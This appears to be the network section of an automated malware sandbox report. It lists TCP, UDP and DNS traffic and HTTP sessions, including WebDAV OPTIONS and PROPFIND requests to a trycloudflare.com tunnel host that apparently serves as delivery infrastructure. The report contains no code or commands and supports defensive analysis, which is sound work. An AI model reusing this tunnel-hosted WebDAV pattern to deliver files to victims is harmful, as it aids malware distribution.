Mar 13, 2025 11:07:45.803420067 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.803515911 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.803539991 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:45.803553104 CET	49698	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:45.803559065 CET	443	49698	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:46.713687897 CET	53104	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:46.719398022 CET	53	53104	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:46.719475985 CET	53104	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:46.724400043 CET	53	53104	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:47.190222979 CET	53104	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:47.195231915 CET	53	53104	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:47.195288897 CET	53104	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:47.339956045 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:47.340007067 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:47.340094090 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:47.340432882 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:47.340446949 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:48.860163927 CET	53111	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:48.860187054 CET	443	53111	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:48.860253096 CET	53111	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:48.860939980 CET	53111	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:48.860956907 CET	443	53111	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:49.086879969 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:49.086975098 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.186281919 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.186330080 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:49.186672926 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:49.196557045 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.240339041 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:49.626172066 CET	53111	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:49.628209114 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:49.628251076 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:49.628325939 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:49.631098032 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:49.631119967 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:49.668325901 CET	443	53111	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:49.730556011 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:49.730618000 CET	443	53106	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:49.730848074 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.730876923 CET	53106	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.898752928 CET	53119	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.898788929 CET	443	53119	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:49.898853064 CET	53119	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.899149895 CET	53119	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:49.899164915 CET	443	53119	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:50.895920992 CET	443	53111	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:50.895997047 CET	53111	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:51.508589029 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:51.509007931 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:51.509040117 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:51.510118008 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:51.510186911 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:51.512375116 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:51.512449980 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:51.512618065 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:51.512629032 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:51.515645027 CET	443	53119	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:51.515734911 CET	53119	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:51.517788887 CET	53119	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:51.517802954 CET	443	53119	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:51.518038034 CET	443	53119	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:51.519007921 CET	53119	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:51.564323902 CET	443	53119	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:51.566586018 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:51.963444948 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:52.003988981 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.004015923 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:52.005769014 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.005856991 CET	443	53114	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:52.005917072 CET	53114	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.100033998 CET	443	53119	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:52.100485086 CET	53119	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:52.113590002 CET	53122	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:52.113631010 CET	443	53122	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:52.113717079 CET	53122	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:52.115245104 CET	53123	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.115309000 CET	443	53123	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:52.115380049 CET	53123	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.115742922 CET	53123	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.115763903 CET	443	53123	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:52.115839005 CET	53122	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:52.115853071 CET	443	53122	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:52.494330883 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:52.494370937 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:52.494640112 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:52.494934082 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:52.494946003 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:52.599814892 CET	53123	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.601079941 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.601123095 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:52.601272106 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.601794004 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:52.601819038 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:52.640332937 CET	443	53123	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:53.358973980 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:53.359015942 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:07:53.359325886 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:53.359708071 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:53.359720945 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:07:53.804408073 CET	443	53122	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:53.805006027 CET	53122	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:53.805032969 CET	443	53122	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:53.805818081 CET	53122	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:53.805833101 CET	443	53122	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.022058010 CET	443	53123	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.022207975 CET	443	53123	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.022285938 CET	53123	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:54.022317886 CET	53123	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:54.196969986 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.197057962 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.198332071 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.198349953 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.198607922 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.199692965 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.240331888 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.328603983 CET	49678	443	192.168.2.10	20.189.173.26
Mar 13, 2025 11:07:54.401705027 CET	443	53122	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.402019024 CET	53122	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.404344082 CET	53130	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.404392004 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.404867887 CET	53130	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.405042887 CET	53130	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.405061007 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.494124889 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.494466066 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:54.494486094 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.494887114 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.495959044 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:54.496076107 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.496227980 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:54.536326885 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.789292097 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.789377928 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.789484978 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.789772034 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.789797068 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.789927006 CET	53124	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.789932966 CET	443	53124	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.793256998 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.793301105 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.793431997 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.793538094 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:54.793548107 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:54.948529959 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.995707035 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:54.995719910 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.996332884 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:54.996690989 CET	443	53125	162.159.134.42	192.168.2.10
Mar 13, 2025 11:07:54.996758938 CET	53125	443	192.168.2.10	162.159.134.42
Mar 13, 2025 11:07:55.406740904 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:07:55.407078981 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:55.407105923 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:07:55.408181906 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:07:55.408262014 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:55.409334898 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:55.409396887 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:07:55.453504086 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:55.453521013 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:07:55.500390053 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:07:56.117930889 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.118704081 CET	53130	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:56.118725061 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.119565010 CET	53130	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:56.119570971 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.625679016 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.626172066 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:56.626188040 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.627679110 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:56.627685070 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.733468056 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.733598948 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:56.733695030 CET	53130	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:56.739012957 CET	53130	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:56.739031076 CET	443	53130	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:57.253276110 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:57.253357887 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:57.253406048 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:57.255017042 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:57.255047083 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:07:57.255063057 CET	53131	443	192.168.2.10	104.16.230.132
Mar 13, 2025 11:07:57.255068064 CET	443	53131	104.16.230.132	192.168.2.10
Mar 13, 2025 11:08:05.221201897 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:05.221434116 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:05.221508980 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:08:05.252126932 CET	53128	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:08:05.252155066 CET	443	53128	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:12.633152962 CET	52734	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:08:12.637928963 CET	53	52734	1.1.1.1	192.168.2.10
Mar 13, 2025 11:08:12.638092041 CET	52734	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:08:12.638160944 CET	52734	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:08:12.642834902 CET	53	52734	1.1.1.1	192.168.2.10
Mar 13, 2025 11:08:13.086221933 CET	53	52734	1.1.1.1	192.168.2.10
Mar 13, 2025 11:08:13.086570024 CET	52734	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:08:13.091514111 CET	53	52734	1.1.1.1	192.168.2.10
Mar 13, 2025 11:08:13.091608047 CET	52734	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:08:42.578937054 CET	49695	80	192.168.2.10	172.217.18.99
Mar 13, 2025 11:08:42.583949089 CET	80	49695	172.217.18.99	192.168.2.10
Mar 13, 2025 11:08:42.584044933 CET	49695	80	192.168.2.10	172.217.18.99
Mar 13, 2025 11:08:53.409069061 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:08:53.409117937 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:53.409212112 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:08:53.409562111 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:08:53.409578085 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:55.430521011 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:55.431031942 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:08:55.431071043 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:55.431890965 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:55.432240009 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:08:55.432332039 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:08:55.485162020 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:09:05.084713936 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:09:05.084800959 CET	443	52738	142.250.184.196	192.168.2.10
Mar 13, 2025 11:09:05.084887028 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:09:05.252485037 CET	52738	443	192.168.2.10	142.250.184.196
Mar 13, 2025 11:09:05.252512932 CET	443	52738	142.250.184.196	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 11:07:44.150882959 CET	53	53980	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:46.713171005 CET	53	61888	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:48.805550098 CET	52680	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:48.805704117 CET	50370	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:48.807960987 CET	53	57558	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:48.811693907 CET	53	64558	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:48.840538979 CET	53	52680	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:48.859407902 CET	53	50370	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:50.221019030 CET	52503	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:50.228823900 CET	53	52503	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:52.408047915 CET	53	63615	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:52.608371973 CET	53	56407	1.1.1.1	192.168.2.10
Mar 13, 2025 11:07:53.349658966 CET	53310	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:07:53.356321096 CET	53	53310	1.1.1.1	192.168.2.10
Mar 13, 2025 11:08:06.954575062 CET	65486	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:08:06.961447001 CET	53	65486	1.1.1.1	192.168.2.10
Mar 13, 2025 11:08:12.632685900 CET	53	51169	1.1.1.1	192.168.2.10
Mar 13, 2025 11:08:34.008462906 CET	138	138	192.168.2.10	192.168.2.255
Mar 13, 2025 11:08:37.627535105 CET	63799	53	192.168.2.10	1.1.1.1
Mar 13, 2025 11:08:37.634371042 CET	53	63799	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 11:07:48.805550098 CET	192.168.2.10	1.1.1.1	0x808	Standard query (0)	www.healyconsultants.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:07:48.805704117 CET	192.168.2.10	1.1.1.1	0xcb72	Standard query (0)	www.healyconsultants.com	65	IN (0x0001)	false
Mar 13, 2025 11:07:50.221019030 CET	192.168.2.10	1.1.1.1	0xab61	Standard query (0)	50.23.12.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Mar 13, 2025 11:07:53.349658966 CET	192.168.2.10	1.1.1.1	0x2040	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:08:06.954575062 CET	192.168.2.10	1.1.1.1	0x4ec4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:08:37.627535105 CET	192.168.2.10	1.1.1.1	0xfbcb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 11:07:48.840538979 CET	1.1.1.1	192.168.2.10	0x808	No error (0)	www.healyconsultants.com	healyconsultants.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:07:48.840538979 CET	1.1.1.1	192.168.2.10	0x808	No error (0)	healyconsultants.com		162.159.134.42	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:07:48.859407902 CET	1.1.1.1	192.168.2.10	0xcb72	No error (0)	www.healyconsultants.com	healyconsultants.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:07:50.228823900 CET	1.1.1.1	192.168.2.10	0xab61	Name error (3)	50.23.12.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Mar 13, 2025 11:07:53.356321096 CET	1.1.1.1	192.168.2.10	0x2040	No error (0)	www.google.com		142.250.184.196	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:08:06.961447001 CET	1.1.1.1	192.168.2.10	0x4ec4	No error (0)	www.google.com		172.217.18.4	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:08:37.634371042 CET	1.1.1.1	192.168.2.10	0xfbcb	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

typically-nut-personalized-syndication.trycloudflare.com

www.healyconsultants.com

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.10	49695	172.217.18.99	80

Timestamp	Bytes transferred	Direction	Data
Mar 13, 2025 11:07:41.069008112 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 13, 2025 11:07:41.702347040 CET	223	IN	HTTP/1.1 304 Not Modified Date: Thu, 13 Mar 2025 09:22:23 GMT Expires: Thu, 13 Mar 2025 10:12:23 GMT Age: 2718 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 13, 2025 11:07:41.706914902 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 13, 2025 11:07:41.904344082 CET	223	IN	HTTP/1.1 304 Not Modified Date: Thu, 13 Mar 2025 09:22:26 GMT Expires: Thu, 13 Mar 2025 10:12:26 GMT Age: 2715 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.10	49681	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:23 UTC	145	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:24 UTC	331	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 10:07:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 91fab95dbcf747a3-DFW CF-Cache-Status: DYNAMIC Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK dav: 1,2 ms-author-via: DAV Server: cloudflare
2025-03-13 10:07:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49682	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:29 UTC	175	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:29 UTC	331	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 10:07:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 91fab982ec4463bd-DFW CF-Cache-Status: DYNAMIC Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK dav: 1,2 ms-author-via: DAV Server: cloudflare
2025-03-13 10:07:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49685	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:07:32 UTC	205	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 79 70 69 63 61 6c 6c 79 2d 6e 75 74 2d 70 65 72 73 6f 6e 61 6c 69 7a 65 64 2d 73 79 6e 64 69 63 61 74 69 6f 6e 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: typically-nut-personalized-syndication.trycloudflare.com
2025-03-13 10:07:33 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Thu, 13 Mar 2025 10:07:32 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 782 Connection: close CF-Ray: 91fab995ca6e6c5e-DFW CF-Cache-Status: DYNAMIC Server: cloudflare
2025-03-13 10:07:33 UTC	782	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 39 54 31 30 3a 34 30 3a 31 37 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 31 33 35 31 35 38 37 32 36 36 35 36 3c 2f 44 Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection/></D:resourcetype><D:creationdate>2024-12-19T10:40:17Z</D:creationdate><D:quota-used-bytes>135158726656</D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49687	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
